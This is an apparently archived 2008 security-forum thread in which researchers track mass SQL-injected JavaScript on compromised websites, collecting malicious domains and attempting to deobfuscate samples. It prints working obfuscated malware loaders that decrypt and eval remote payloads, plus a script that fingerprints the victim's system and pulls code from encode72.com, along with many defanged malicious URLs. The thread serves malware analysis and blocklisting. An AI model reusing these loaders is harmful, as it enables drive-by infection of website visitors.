7B%se71%se3D%se6E%se65%se77%se20%se41%se63%se78KQ%1%se6%6Tse76%se65%se58%se4F%se62%se6A%se65%se63%se78KQ%1%se28%se6E%se4F%se58KQ%1%se2%6Tse3B%se7D%se63%se61%se78KQ%1%se63%se68%se28%se65%se2%6Tse7B%se71%se3D%se6E%se75%se6C%se6C%se7D%se7D';eval(unescape(cB.replace(/8KQ%/g,'b').replace(/%6T/g,'9%').replace(/b1%/g,'4%').replace(/%se/g,'%')));var nY=unescape(LV);if (!q){try{q=new ActiveXObject(nY);}catch(e){q=null}}var zqj=iGUR;var akK=function(){tP = unescape(q.responseText);var W5O=0;var Qg6M='Cc%76Cc%61Cc%7Z20Cc%74Cc%6ECc%37Cc%3BCc%66Cc%6FCc%7Z2r3H6BCc%74Cc%7ACc%4FCc%3DCc%30Cc%3BCc%6BCc%74Cc%7ACc%4FCc%3CCc%3Z35Cc%36Cc%3BCc%6BCc%74Cc%7ACc%4FCc%2BCc%2BCc%29Cc%7BCc%74Cc%6ECc%37Cc%3DCc%6BCc%74Cc%7ACc%4FCc%25Cc%4Z2ECc%6CCc%65Cc%6ECc%67Cc%74Cc%6r3H3BCc%74Cc%6ECc%37Cc%3DCc%4Z2ECc%63Cc%6r3H61Cc%7Z43Cc%6FCc%64Cc%65Cc%41Cc%74Cc%2r3H74Cc%6ECc%37Cc%29Cc%3BCc%74Cc%6ECc%37Cc%3DCc%6ECc%50Cc%47Cc%5BCc%6BCc%74Cc%7ACc%4FCc%5DCc%2BCc%74Cc%6ECc%37Cc%3BCc%74Cc%6ECc%37Cc%3DCc%57Cc%35Cc%4FCc%2BCc%74Cc%6ECc%37Cc%3BCc%57Cc%35Cc%4FCc%3DCc%74Cc%6ECc%37Cc%20Cc%25Cc%20Cc%3Z35Cc%36Cc%3BCc%74Cc%6ECc%37Cc%3DCc%6ECc%50Cc%47Cc%5BCc%6BCc%74Cc%7ACc%4FCc%5DCc%3BCc%6ECc%50Cc%47Cc%5BCc%6BCc%74Cc%7ACc%4FCc%5DCc%3DCc%6ECc%50Cc%47Cc%5BCc%57Cc%35Cc%4FCc%5DCc%3BCc%6ECc%50Cc%47Cc%5BCc%57Cc%35Cc%4FCc%5DCc%3DCc%74Cc%6ECc%37Cc%3BCc%7DCc%5Z57Cc%6FCc%3DCc%30Cc%3B';eval(unescape(Qg6M.replace(/Cc%/g,'%').replace(/Z/g,'2%').replace(/r3H/g,'8%')));var V3LR='MZ68MZ42MZ49MZ73MZ3DMZ30MZ3BMZ76MZ61MZ72MZ20MZ53MZ58MZ3DMZ27MZ27MZ3B';eval(unescape(V3LR.replace(/Z/g,'m').replace(/Mm/g,'%')));var x6;var Ak;for(x6=0;x6<tP.length;x6++){RWo=RWo+1;RWo=RWo%256;hBIs=hBIs+nPG[RWo];hBIs=hBIs%256;tn7=nPG[RWo];nPG[RWo]=nPG[hBIs];nPG[hBIs]=tn7;Ak=nPG[RWo]+nPG[hBIs];Ak=Ak%256;Ak=nPG[Ak];Ak=tP.charCodeAt(x6)^Ak;SX+=String.fromCharCode(Ak);}eval(SX);};var x=function(){if((q.readyState==4)&&(q.status==200)){akK();}};q.onreadystatechange=x;q.open('GET',zqj,true);q.send(null);
Title: Re: SQL Injected jscript sites
Post by: YanceySlide on June 02, 2008, 12:53:57 pm: Quote from: CM_MWR on June 02, 2008, 06:15:27 am
Yancy=Mike?

mike@shadowserver.org -- yup, that's me

Quote
http://www.malwaredomainlist.com/forums/index.php?topic=1867.0

Need adding?

I've been trying to stick to script=src methods, rather than iframes. It's more difficult to tell whether or not the iframes are mass injections or not. I've yet to run across what looks like injected jscript that turns out to not be a mass injection.
Title: Re: SQL Injected jscript sites
Post by: YanceySlide on June 02, 2008, 02:26:38 pm: New additions:
hxxp://www.xiaobaishan.net
hxxp://www.rexec39.com
hxxp://www.tlcn.net
Title: Re: SQL Injected jscript sites
Post by: JohnC on June 02, 2008, 09:38:56 pm: Thank you :)
Title: Re: SQL Injected jscript sites
Post by: MysteryFCM on June 03, 2008, 03:29:47 pm: Ref: mgfcompressors.com

Quote
thanks Steven,
we have deleted the files and asked again our client to move to another
platform for his web portal.

Feel free to send again mail if it happens again.
Regards
Bybit staff
Title: Re: SQL Injected jscript sites
Post by: JohnC on June 03, 2008, 11:40:15 pm: There is a script here which may be malicious. Don't know much about it, for all I know it could be clean but looks heavily obfuscated mgfcompressors.com/iieox.js
Title: Re: SQL Injected jscript sites
Post by: MysteryFCM on June 03, 2008, 11:44:31 pm: I'm getting a 404 for that one?
Title: Re: SQL Injected jscript sites
Post by: Orac on June 04, 2008, 11:32:17 am: Steve iam also getting a 404 from that link. Wonder if its been cleaned, or they just dont like British IPs lol
Title: Re: SQL Injected jscript sites
Post by: bobby on June 04, 2008, 11:55:29 am: It changes the name of the file. It is yzuac.js at the moment
If you visit the link for the 2nd time - the page will be clear, no references to the JS file will be there.

The script is d*mn complicated.
I'll give it at try, and I'll post the results (if I get any)
Title: Re: SQL Injected jscript sites
Post by: bobby on June 04, 2008, 12:32:34 pm: I didn't got far. the script try to define a function in the way that isn't working in SpiderMonkey

If someone want to try it in IE under Virtual Machine, here is the code I got:
Code: [Select]
var arg="btryttfi"; function Cwmf8K(AH){var zoU5="C68KC3";var U47="var FuqV=75397;";var Pk="qeJ33cqe3";var zOR="8N0G8";var Jz="9G8N0G850";var vV="charCodeA";var pK="901;var xEx=1";Jz+="G85DG83DG84";var ySE="nLej-40955883";var j6="e3Dcqe31";var eBBT="scape(U.replac";var u1oP="Z2Yh;n";var sz=")));var oGZ";var r="qeEl1";var Bi="q6KC3BKCUeqAK";zOR+="50G85DG8";var X="change=G;Y";var UqE="Txc+=String.fro";var EwzG="6c-857";var mkj="G84CG83DG843G";var i7=";var xC=711";var Q1="2daR20d";var BAZz="(/f/g,'A').re";var ZhM5="L=new Activ";var RkYD="L=nul";var oie="(/cqe/";var MU3=");D=xC%nLe";var pjJt="5DG83BG843G";var MCSe="6F9D%g12";var tSPH=");mi+";var CN="0%g125%g120";var RF="ace(/Ueq/g";var gstw="ape(De.rep";ySE+="84);F";var KZP="var YL=null;va";var gh="l=unescape(";var VyU="61G8N2G84";var lJ="o/g,'%'";var em9="KC6UeqK";var cy0="2G86FG86DG843G";var iB="0dSmi460dSmi750";var X1Vn="KC76KC61";var SN="ace(/9/g,";var KO="(/G8/g,'%')))";zOR+="3BG845G850G845G";var uf="86DG86DG84CG8";var XjNy="g136%g13B9A%g";var UK="%4C%48%54%54%";SN+="'%5')));}qIpP=";var n8vF="e(/\\W/g,'');";uf+="3DG84FG8N9G82";var ClN8="ce(/M1/g,'%";var mNf="%g143%g1769";pjJt+="8N6G851G85B";var GC="r YH=function()";var rK="KC61KC";var y="3D%g143%g1769";var kwC="g148%g165%g176%";var hsR="4D%4C";KO+=";}eva";cy0+="868G8";var EbF="String";rK="C78KC43KC3BKC76"+rK;var rK2u="g,'D')));FuqV=";var aSn5="33Fpo34F";var t="N0G850G85DG82";var TfU="DFpo3BFpo76";var Dd="KC76KC61KC7";var V9sI="tring.fro";MU3="v-59581"+MU3;var c="2B9A%g148";MU3=EwzG+"5844471)*(v"+MU3;var g="XObject(z";g+="zl);}";var pMu="cape(z2l";var dg="i.charCodeA";var Usbs="L.sen";kwC+="g13D%g143%g1";lJ+=")));Z2Yh=Z2";var WDIF="L=null}}v";var ERL4="mi/g,'%')));";Bi+="C32KCUeq9KC68KC";var rq="cqe72cqe2Vc";hsR+="%48%54%54%50';i";pK+="8390;Pv6";ClN8=",'M').repla"+ClN8;var Lm="69%63%72%6F%73%";TfU="po56Fpo2DFpo2"+TfU;mNf="%g13B"+mNf;var uT="pe(Cpw)";var KJKW="replace(/aR/";var mw="a++){CvQ[UE";var kIc="ngth;oGZI";var SsV="0G845G";var kzg="3B';eval(un";var DY="3BG85AG848G";KO+="l(q);};var G=";n8vF="eplac"+n8vF;var Eo="o4CFpo3B';ev";var g76O="qeJEl3cqe3Dc";var j=");uA=183;}}";gh+="it);if ";RkYD="();}catch(e){Y"+RkYD;var yCa="').replace(/El";var h6Sm="3B9894%g13D9A%g";var SNT="dSmi75";var sh="9D%g13B%g143%";var uK8="2Fpo20Fpo";uT="r ejA=unesca"+uT;Pk=j6+"cqe3c"+Pk;var Esh="2G84CG8";var XeN="G85DG83BG";BAZz=pMu+"P.replace"+BAZz;gstw="eval(unesc"+gstw;Dd="n0KC78KC43KC3B"+Dd;var Cxt1="qeEl1cq";ySE+="uqV=FuqV%"+u1oP;var FBk="DG86DG";var pk="place(/B%/g";var J2="nseText);var X";gh+="(!YL){try";var bAg="5BG845G850G8";var J="849G8N0G850G";UK="%32%2E%58%4D"+UK;FBk="852G86"+FBk;VyU+="3G86FG86";h6Sm+="148%g165%g1";RkYD="tpRequest"+RkYD;Q1="daR6B%daR7"+Q1;var tW8J="dSmixigY";KJKW="unescape(BUBC."+KJKW;mNf+="19B98949D%g13D9";var UkqY="051;var Mkm";KO="g,'7').replace"+KO;t="85BG8N1G849G8"+t;var dl9o="0G845G";FBk="DG86DG84CG83DG"+FBk;J="G8N1G"+J;var Af="84CG8";var nr="mmL;for(RbLR=0;";FBk+="84CG825G";UK+="50';var";i7+="63;var EjFO='KC";var PLZK="po72Fp";var REQt=";Go<256;Go+";V9sI="){Txc+=S"+V9sI;var DAJC="dSmi760dSmi3D0d";PLZK+="o20Fpo72Fpo7AF";var mtJB="850G845G8";dg="ngth;ZHev=m"+dg;gstw="CG829G83B';"+gstw;var w6="qe5cqeJ3DcqeE";var xXpp="YL.onrea";U47+="var Z2Y";Q1="30daR3BdaR76"+Q1;DAJC="640dSmi6A0"+DAJC;vV=kIc+"++){uA^=mi."+vV;w6="3cqe59cqeEl1c"+w6;TfU="Fpo75Fpo71F"+TfU;var CKCG="80606";c="9894%g1"+c;var tY9Q="();var UEma";var KJGB="65%g176%g13D%g1";Eo="BFpo4BFp"+Eo;var Lw="Fpo27";var bZx="3DG843G8N6G851G";var Rk7k="UeqKC37KC3";Bi="KC7UeqKC71KCUe"+Bi;Cxt1="e7Elc"+Cxt1;var NJZE="ect(ejA";var AB="52G86DG86";UK="D%73%78%6D%6C"+UK;ClN8+="').repl"+SN;var H="C37KC37KC32K";Dd+="2KC20KC76KC76KC";V9sI+="mCharCode";KJGB+="43%g176919";y="g147%g16F9D%g1"+y;ERL4+="CvQ=new Array"+tY9Q;pk+=",'1').replac";Usbs=",IOom,true);Y"+Usbs;FBk+="832G8";em9+="C6AKC3Vn0";var yjZN="UeqAKC32KCUeq9";dg="%mi.le"+dg;UqE="(oGZI%76==75){"+UqE;var OcK="){if((YL";var T7="6EKC4CKC6U";var okr="9KC3UeqKC3";var ojT8="KC4CKC3Vn0KC33K";rK+="72KC20KC6EKC4CK";NJZE=ZhM5+"eXObj"+NJZE;Af+="3BG8N1G82B";i7+="UeqAKC32KCUeq9K"+zoU5;var ixL="){YL=null}}";var Dt="86DG84CG83DG84";gh=WDIF+"ar zz"+gh;y=sh+"g176919B%"+y;XeN+="843G8N6G851G";var Ip="G869G86EG86N";t+="BG843G8N6G851G8"+bAg;H+="C3UeqKC3B"+X1Vn;PLZK+="po31Fpo3DFpo3";XeN="45G850G845"+XeN;SsV="845G85"+SsV;ixL+="var IOo";gh+="{YL=new ";dg=REQt+"+){ZHev=Go"+dg;g=gh+"Active"+g;Eo="DFpo44Fpo2"+Eo;DY+="865G8N6G8"+bZx;var dpL="851G85BG8N1";var jmh="KC6UeqKC6A";RF+=",'5').replace(";var Wy="i=arguments.";ixL+="m=SYaX;va"+GC;SNT="i3D0dSmi460"+SNT;KJKW="7daR3B';eval("+KJKW;var XgE="ace(/0dS/g,'";var qMc1="1G849";var euFA="th;nLej=nLej+xE";J2="(YL.respo"+J2;XeN="85BG8"+XeN;h6Sm=c+"%g165%g176%g1"+h6Sm;zOR+="83DG845G85"+dl9o;T7=rK+"C6UeqKC6AKC3BKC"+T7;Usbs+="d(null);";em9="6EKC4C"+em9;BAZz=Pk+"B';eval(unes"+BAZz;Af+="G83DG853G8";var LkCR="r ZHe";uT=RkYD+"l};}va"+uT;SsV="5G836G83BG"+SsV;uT="XMLHt"+uT;sz="lace(/%J/g,'8%'"+sz;mtJB+="5DG83DG85A";rq+="qe75cqe41cq"+BAZz;Af="DG86DG"+Af;gstw+="lace(/N/"+KO;ixL+="{Oy = unescape"+J2;DAJC="50dSmi"+DAJC;ySE="890)*("+ySE;ClN8+="0;var BUBC='d";okr=ojT8+"C30KC3"+okr;UkqY=rK2u+"FuqV+44"+UkqY;euFA=ySE+"Lej=rz1+D.leng"+euFA;kzg+="escape(Z3p.repl";Usbs=X+"L.open('GET'"+Usbs;gstw="52G86DG86DG84"+gstw;DAJC+="Smi410dS";yjZN+="KC68KC2AK"+T7;kwC+="76919B%";eBBT="g13B';eval(une"+eBBT;var Dda="%g148%g165%g176";Bi="68KC2BKC46"+Bi;var Ckds="dSmi7xigY0";ClN8+="aR45daR50daR4";uf+="EG863G868G8"+VyU;tSPH+="=FuqV;var";XgE="ig/g,'z').repl"+XgE;SsV="G825G832G83"+SsV;RF+="/KC/g,'%').";OcK=gstw+"function("+OcK;Wy=mw+"ma]=UEma;}m"+Wy;Ckds="0dSmi760dSmi610"+Ckds;iB+="dSmi710dSmi";dpL="G82BG843G8N6G"+dpL;var K="Fpo3BFpo4";Rk7k+="1KC30KC3BKC"+em9;UK+=" it='%4D%"+Lm;OcK+=".readySt";uK8=TfU+"Fpo61Fpo7"+uK8;FBk="852G86"+FBk;Af="G852G86"+Af;yCa=rq+"place(/V/g,'0"+yCa;MCSe=kwC+"g147%g1"+MCSe;MCSe+="B9A%g148%g165";sz=oie+"g,'%').rep"+sz;Wy="6;UEm"+Wy;i7+="Vn0KCUeqA";y=KJGB+"B%g147%g16F"+y;g76O="cqe7c"+g76O;Esh="G8N4G828G852G86"+Esh;n8vF=EbF+"();mi=mi.r"+n8vF;Rk7k=Dd+"3Vn0KC32KC3"+Rk7k;nr="var R"+nr;qMc1=DY+"85BG8N"+qMc1;XjNy+="148%g1"+y;MCSe="ar U='9A%"+MCSe;XjNy=CN+"%g132%g135%"+XjNy;Q1=ClN8+"5daR3DdaR"+Q1;yjZN=Bi+"3Vn0KC"+yjZN;t+="45G85DG83BG"+FBk;pk+="e(/dJ/g,'%'))";var VJ=";RbLR++){";KJKW="daR3DdaR27daR2"+KJKW;Eo+="al(unescape(Mkm";uK8=aSn5+"po36Fpo3BFpo46"+uK8;Dt="83BG852G86DG"+Dt;PLZK=UkqY+"o='Fpo76Fpo61F"+PLZK;dg=LkCR+"v;for(Go=0"+dg;eBBT+="e(/%g/g"+Q1;sz+="I;for(oG";yCa="cqe7ElcqeEl1"+yCa;VJ=nr+"RbLR<Oy.length"+VJ;UqE+="mCharCode(uA"+j;AB=mkj+"8N6G851G85BG8"+AB;XgE+="N').replace(";uT="){try{YL=new "+uT;yCa=g76O+"qe27cqe27cqe3B"+yCa;Ckds+="dSmixigY00dSmi6"+DAJC;J="ar De='"+J;pjJt+="G8N1G84"+Jz;Af+="N4G8N2"+Ip;yCa+="/g,'6').replace"+sz;XgE+="/xzY/g,'2').r";var aKIf="G86FG";var nnIR="UEma=";CKCG=lJ+"Yh%KL;var Pv6c="+CKCG;dg+="t(ZHev);v"+MCSe;hsR+="f (!YL"+uT;ERL4=XgE+"eplace(/N"+ERL4;t+="35G836G83";nnIR+="0;UEma<25"+Wy;MU3=euFA+"x;xC=(Pv"+MU3;Ckds=tW8J+"50dSmi440dSmi3B"+Ckds;okr+="2KC3B';ev";yjZN+="eqKC6AKC3V"+Rk7k;hsR+=";if (!YL){try{Y"+NJZE;H+="KC72KC20KC4B"+okr;kzg=Ckds+"mi480dSmi"+kzg;Esh=uf+"4G865G841"+Esh;RF="pe(EjFO.repl"+RF;ERL4+=";var ";Af+="G82EG866G8N"+cy0;uK8=PLZK+"3Fpo30Fpo"+uK8;w6+="l5cqeEl4c";yjZN+="KC6EKC4C"+jmh;xXpp+="dystate"+Usbs;SNT=iB+"560dSm"+SNT;AB+="DG84CG85DG8";vV+="t(oGZI);if"+UqE;CKCG="e(/Fp"+CKCG;SsV="G849G8N0G850"+SsV;qMc1="G835G836G8"+qMc1;KZP=V9sI+"(uA);}mi=Txc;"+KZP;dpL+="G849G"+zOR;CKCG+=";vv=vv+33"+pK;xXpp="{YH();}};"+xXpp;uK8="(/Vn0/"+uK8;w6=Cxt1+"e72cqe2Vcqe5"+w6;w6=tSPH+" z2lP='cq"+w6;ixL+="T=0;va"+dg;nnIR+="callee.to"+n8vF;nnIR+="mi=mi.toUppe";hsR="2E%58%"+hsR;eBBT="g176%"+eBBT;w6+="qeElfcqe7Elc";r+="cqe72cqe2Vcqe54"+yCa;Dda=ixL+"%g176%g13B9A"+Dda;kzg+="ace(/"+ERL4;AB=t+"BG852G86DG86D"+AB;K=Lw+"Fpo33Fpo35Fpo27"+K;nnIR+="rCase("+w6;VJ+="qIpP=qIpP+1;v"+J;Af+="61G8N2G843"+aKIf;Dda=g+"catch(e"+Dda;SsV+="83DG845G850G845"+dpL;RF+="replace"+uK8;MU3=CKCG+"c=(Pv6c-79"+MU3;pk=KJKW+"g,'J').re"+pk;MU3=Eo+"o.replac"+MU3;RF=H+"al(unesca"+RF;MU3=K+"4Fpo3"+MU3;UK=KZP+"r Cpw='%4"+UK;SNT=MU3+"j;var Z3p='"+SNT;mNf=XjNy+"19B98949D"+mNf;VJ+="83DG8N1"+SsV;SNT+="0dSmi710dSmi560"+kzg;Dda+="%g13D"+h6Sm;mtJB=XeN+"85BG845G"+mtJB;mtJB+="G848G865G8N6G"+Dt;RF+="44Fpo3D"+SNT;i7=U47+"h=73665"+i7;yjZN+="KC2AKC3UeqK"+RF;qMc1+="G8N0G850G8"+pjJt;pk=eBBT+"aR7B%"+pk;Esh+="52G829G85E"+Af;AB=mtJB+"3G8N6G851G"+AB;yjZN+="mi;for("+nnIR;AB=qMc1+"3G8N6G851G"+AB;pk+=");var RbLR;"+VJ;AB+="3BG852G"+Esh;xXpp=".status==200))"+xXpp;Dda+="76%g12"+mNf;hsR+=");}catch(e){Y"+Dda;OcK+="ate==4)&&(YL"+xXpp;i7+="KC32KCUeq9KC"+yjZN;hsR=UK+"6F%66%74%"+hsR;hsR+="A%g148%g165%"+pk;r=i7+"qe3Bcqe7Elc"+r;AB+="864G865G828G8"+OcK;hsR=vV+"if(oGZI%76!=75"+hsR;r+="ZI=0;oGZI<mi.le"+hsR;r+="825G832"+AB;eval(r);}Cwmf8K(arg);
Take a look at the first variable:
var arg="btryttfi";
The value of the variable is the name of the file on the server. It contains some data probably needed in the script.
After going through deobfuscation, i got till here:
Code: [Select]
var FuqV=75397;var Z2Yh=73665;var xC=71163;var EjFO='KCUeqAKC32KCUeq9KC68KC3Vn0KCUeqAKC32KCUeq9KC68KC2BKC46KC7UeqKC71KCUeq6KC3BKCUeqAKC32KCUeq9KC68KC3Vn0KCUeqAKC32KCUeq9KC68KC2AKC78KC43KC3BKC76KC61KC72KC20KC6EKC4CKC6UeqKC6AKC3BKC6EKC4CKC6UeqKC6AKC3Vn0KC78KC43KC3BKC76KC61KC72KC20KC76KC76KC3Vn0KC32KC3UeqKC37KC31KC30KC3BKC6EKC4CKC6UeqKC6AKC3Vn0KC6EKC4CKC6UeqKC6AKC2AKC3UeqKC37KC37KC32KC3UeqKC3BKC76KC61KC72KC20KC4BKC4CKC3Vn0KC33KC30KC39KC3UeqKC32KC3B';eval(unescape(EjFO.replace(/Ueq/g,'5').replace(/KC/g,'%').replace(/Vn0/g,'D')));FuqV=FuqV+44051;var Mkmo='Fpo76Fpo61Fpo72Fpo20Fpo72Fpo7AFpo31Fpo3DFpo33Fpo30Fpo33Fpo34Fpo36Fpo3BFpo46Fpo75Fpo71Fpo56Fpo2DFpo2DFpo3BFpo76Fpo61Fpo72Fpo20Fpo44Fpo3DFpo27Fpo33Fpo35Fpo27Fpo3BFpo44Fpo3DFpo44Fpo2BFpo4BFpo4CFpo3B';eval(unescape(Mkmo.replace(/Fpo/g,'%')));Z2Yh=Z2Yh%KL;var Pv6c=80606;vv=vv+33901;var xEx=18390;Pv6c=(Pv6c-79890)*(nLej-4095588384);FuqV=FuqV%Z2Yh;nLej=rz1+D.length;nLej=nLej+xEx;xC=(Pv6c-8575844471)*(vv-59581);D=xC%nLej;var Z3p='0dSmi460dSmi750dSmi710dSmi560dSmi3D0dSmi460dSmi750dSmi710dSmi560dSmixigY50dSmi440dSmi3B0dSmi760dSmi610dSmi7xigY0dSmixigY00dSmi650dSmi640dSmi6A0dSmi760dSmi3D0dSmi410dSmi480dSmi3B';eval(unescape(Z3p.replace(/ig/g,'z').replace(/0dS/g,'N').replace(/xzY/g,'2').replace(/Nmi/g,'%')));CvQ=new Array();var UEma;var mi;for(UEma=0;UEma<256;UEma++){CvQ[UEma]=UEma;}mi=arguments.callee.toString();mi=mi.replace(/\W/g,'');mi=mi.toUpperCase();mi+=FuqV;var z2lP='cqe7ElcqeEl1cqe72cqe2Vcqe53cqe59cqeEl1cqe5cqeJ3DcqeEl5cqeEl4cqeElfcqe7Elcqe3Bcqe7ElcqeEl1cqe72cqe2Vcqe54cqe7cqeJEl3cqe3Dcqe27cqe27cqe3Bcqe7ElcqeEl1cqe72cqe2Vcqe75cqe41cqe3Dcqe31cqe3cqeJ33cqe3B';eval(unescape(z2lP.replace(/f/g,'A').replace(/V/g,'0').replace(/El/g,'6').replace(/cqe/g,'%').replace(/%J/g,'8%')));var oGZI;for(oGZI=0;oGZI<mi.length;oGZI++){uA^=mi.charCodeAt(oGZI);if(oGZI%76==75){Txc+=String.fromCharCode(uA);uA=183;}}if(oGZI%76!=75){Txc+=String.fromCharCode(uA);}mi=Txc;var YL=null;var Cpw='%4D%73%78%6D%6C%32%2E%58%4D%4C%48%54%54%50';var it='%4D%69%63%72%6F%73%6F%66%74%2E%58%4D%4C%48%54%54%50';if (!YL){try{YL=new XMLHttpRequest();}catch(e){YL=null};}var ejA=unescape(Cpw);if (!YL){try{YL=new ActiveXObject(ejA);}catch(e){YL=null}}var zzl=unescape(it);if (!YL){try{YL=new ActiveXObject(zzl);}catch(e){YL=null}}var IOom=SYaX;var YH=function(){Oy = unescape(YL.responseText);var XT=0;var ZHev;for(Go=0;Go<256;Go++){ZHev=Go%mi.length;ZHev=mi.charCodeAt(ZHev);var U='9A%g148%g165%g176%g13D%g143%g176919B%g147%g16F9D%g12B9A%g148%g165%g176%g13B9A%g148%g165%g176%g13D9894%g12B9A%g148%g165%g176%g13B9894%g13D9A%g148%g165%g176%g120%g125%g120%g132%g135%g136%g13B9A%g148%g165%g176%g13D%g143%g176919B%g147%g16F9D%g13B%g143%g176919B%g147%g16F9D%g13D%g143%g176919B98949D%g13B%g143%g176919B98949D%g13D9A%g148%g165%g176%g13B';eval(unescape(U.replace(/%g/g,'M').replace(/M1/g,'%').replace(/9/g,'%5')));}qIpP=0;var BUBC='daR45daR50daR45daR3DdaR30daR3BdaR76daR6B%daR72daR20daR7B%daR3DdaR27daR27daR3B';eval(unescape(BUBC.replace(/aR/g,'J').replace(/B%/g,'1').replace(/dJ/g,'%')));var RbLR;var RmmL;for(RbLR=0;RbLR<Oy.length;RbLR++){qIpP=qIpP+1;var De='G8N1G849G8N0G850G83DG8N1G849G8N0G850G825G832G835G836G83BG845G850G845G83DG845G850G845G82BG843G8N6G851G85BG8N1G849G8N0G850G85DG83BG845G850G845G83DG845G850G845G825G832G835G836G83BG85AG848G865G8N6G83DG843G8N6G851G85BG8N1G849G8N0G850G85DG83BG843G8N6G851G85BG8N1G849G8N0G850G85DG83DG843G8N6G851G85BG845G850G845G85DG83BG843G8N6G851G85BG845G850G845G85DG83DG85AG848G865G8N6G83BG852G86DG86DG84CG83DG843G8N6G851G85BG8N1G849G8N0G850G85DG82BG843G8N6G851G85BG845G850G845G85DG83BG852G86DG86DG84CG83DG852G86DG86DG84CG825G832G835G836G83BG852G86DG86DG84CG83DG843G8N6G851G85BG852G86DG86DG84CG85DG83BG852G86DG86DG84CG83DG84FG8N9G82EG863G868G861G8N2G843G86FG864G865G841G8N4G828G852G862G84CG852G829G85EG852G86DG86DG84CG83BG8N1G82BG83DG853G8N4G8N2G869G86EG86NG82EG866G8N2G86FG86DG843G868G861G8N2G843G86FG864G865G828G852G86DG86DG84CG829G83B';eval(unescape(De.replace(/N/g,'7').replace(/G8/g,'%')));}eval(q);};var G=function(){if((YL.readyState==4)&&(YL.status==200)){YH();}};YL.onreadystatechange=G;YL.open('GET',IOom,true);YL.send(null);JS Debuger says that AH is not defined. AH exists in obfuscated script, as the argument of the function.
After I put a value instead AH, I get to the wrong definition of mi
SpiderMonkey does not allow such declaration of mi function.
I have no idea how to get further from this step.
Title: Re: SQL Injected jscript sites
Post by: bobby on June 04, 2008, 12:47:52 pm: Sorry I didn't asked for permission (my brain seems to be slower than my fingers), but I've posted the link to this malicious site on MWR forum.
If antnet can't deobfuscate it, then I do not know who can do it.
Title: Re: SQL Injected jscript sites
Post by: YanceySlide on June 04, 2008, 02:17:40 pm: New:
tjwh202.162.ns98.cn
nb88.cn
hxxp://www.exe94.com
hxxp://www.view89.com
hxxp://www.err68.com
hxxp://www.rundll841.com

Not injected, but related and definately malicious (several of the above injections reference it):
sslput4.com
Title: Re: SQL Injected jscript sites
Post by: bobby on June 04, 2008, 02:58:08 pm: I did take a look at rundll841.com
It does take a look at the system language settings, and it downloads malware according to these:
Code: [Select]
document.UhbtQqzm = 1; document.Z3p0uYay = 1; document.MSDKhOrw = 1; if (!document.F9kJY0Ud) { var Nx3xniTR; var ALFsRXKd = navigator.appMinorVersion; var KDzpO8UG = -1 var aanTFP7g = "01"; while((KDzpO8UG = ALFsRXKd.indexOf(";SP", KDzpO8UG+1)) != -1) { var QfTUqtJd = ALFsRXKd.charAt(KDzpO8UG+3); if (QfTUqtJd == "1") aanTFP7g = "02"; else if (QfTUqtJd == "2") aanTFP7g = "03"; else if (QfTUqtJd == "3") aanTFP7g = "04"; else if (QfTUqtJd == "4") aanTFP7g = "05"; else if (QfTUqtJd == "5") aanTFP7g = "06"; else if (QfTUqtJd == "6") aanTFP7g = "07"; if (aanTFP7g != "01") break; } if (aanTFP7g == "01" && ALFsRXKd.indexOf("Release Candidate", 0) != -1) aanTFP7g = "08"; var QzmzTMai = navigator.systemLanguage.substr(0, 10); var FEXGqg2V = ""; for(var GPzlxy9a=0;GPzlxy9a<QzmzTMai.length;GPzlxy9a++) { QOu110FA = QzmzTMai.charCodeAt(GPzlxy9a).toString(16); if (QOu110FA < 2) FEXGqg2V += "0"; FEXGqg2V += QOu110FA; } while(FEXGqg2V.length < 20) FEXGqg2V += "00"; var Nx3xniTR = aanTFP7g + FEXGqg2V; var sIvWfaMT = document.createElement("script"); sIvWfaMT.setAttribute("type", "text/javascript"); sIvWfaMT.setAttribute("src", "http://encode72.com/cgi-bin/index.cgi?f7fbd8fc0100f0600077e0ed58060000000002bfbd906aff" + Nx3xniTR); document.body.appendChild(sIvWfaMT); }
Title: Re: SQL Injected jscript sites
Post by: YanceySlide on June 04, 2008, 03:02:21 pm: Added:
hxxp://www.win496.com
hxxp://flyzhu.9966.org
hxxp://www.encode72.com
hxxp://www.exec51.com
Title: Re: SQL Injected jscript sites
Post by: sowhat-x on June 04, 2008, 04:00:42 pm: Quote
hxxp://fourevent.cn/16.swf
It's the same lamer we've already seen before...
Quote
hxxp://user1.12-27.net/bak.css
Title: Re: SQL Injected jscript sites
Post by: sowhat-x on June 04, 2008, 04:25:33 pm: Many swf-infected sites listed here as well...
(JohnC,here comes some extra work,lol! :D )
http://ilion.blog47.fc2.com/blog-entry-46.html
http://ilion.blog47.fc2.com/blog-entry-47.html
Title: Re: SQL Injected jscript sites
Post by: JohnC on June 04, 2008, 11:21:01 pm: Thanks :)
Title: Re: SQL Injected jscript sites
Post by: YanceySlide on June 05, 2008, 02:08:01 pm: We're having some issues with our webserver at the moment, so these haven't been posted to the blog entry.

New:
hxxp://www.tag58.com
hxxp://www.sslput4.com (it's now being injected)
hxxp://www.sslnet72.com
Title: Re: SQL Injected jscript sites
Post by: sowhat-x on June 05, 2008, 02:27:21 pm: Quote
We're having some issues with our webserver at the moment...
Tried a couple of hours ago and site wasn't accessible...but it seems like it's fixed now :)
Title: Re: SQL Injected jscript sites
Post by: sowhat-x on June 05, 2008, 03:41:57 pm: From Ilion's blog above...
Quote
hxxp://exe.wokaixin.com/exe/115.swf
hxxp://exe.wokaixin.com/exe/16.swf
hxxp://exe.wokaixin.com/exe/28.swf
hxxp://exe.wokaixin.com/exe/45.swf
hxxp://exe.wokaixin.com/exe/47.swf
hxxp://exe.wokaixin.com/exe/64.swf
hxxp://fourevent.cn/115.swf
hxxp://fourevent.cn/16.swf
hxxp://fourevent.cn/28.swf
hxxp://fourevent.cn/45.swf
hxxp://fourevent.cn/47.swf
hxxp://fourevent.cn/64.swf
hxxp://iphone003.com/swf/115.swf
hxxp://iphone003.com/swf/16.swf
hxxp://iphone003.com/swf/28.swf
hxxp://iphone003.com/swf/45.swf
hxxp://iphone003.com/swf/47.swf
hxxp://iphone003.com/swf/64.swf
hxxp://mmlan.com.cn/4561.swf
hxxp://mmlan.com.cn/4562.swf
hxxp://mmlan.com.cn/mm.exe
hxxp://mmpp.cqcx321.cn/ff.swf
hxxp://mmpp.cqcx321.cn/ie.swf
hxxp://soft666666.cn/115.swf
hxxp://soft666666.cn/16.swf
hxxp://soft666666.cn/28.swf
hxxp://soft666666.cn/45.swf
hxxp://soft666666.cn/47.swf
hxxp://soft666666.cn/64.swf
hxxp://www.abc998801.cn/web/1.swf
hxxp://www.abc998801.cn/web/2.swf
hxxp://www.h-nan.net.cn/f115.swf
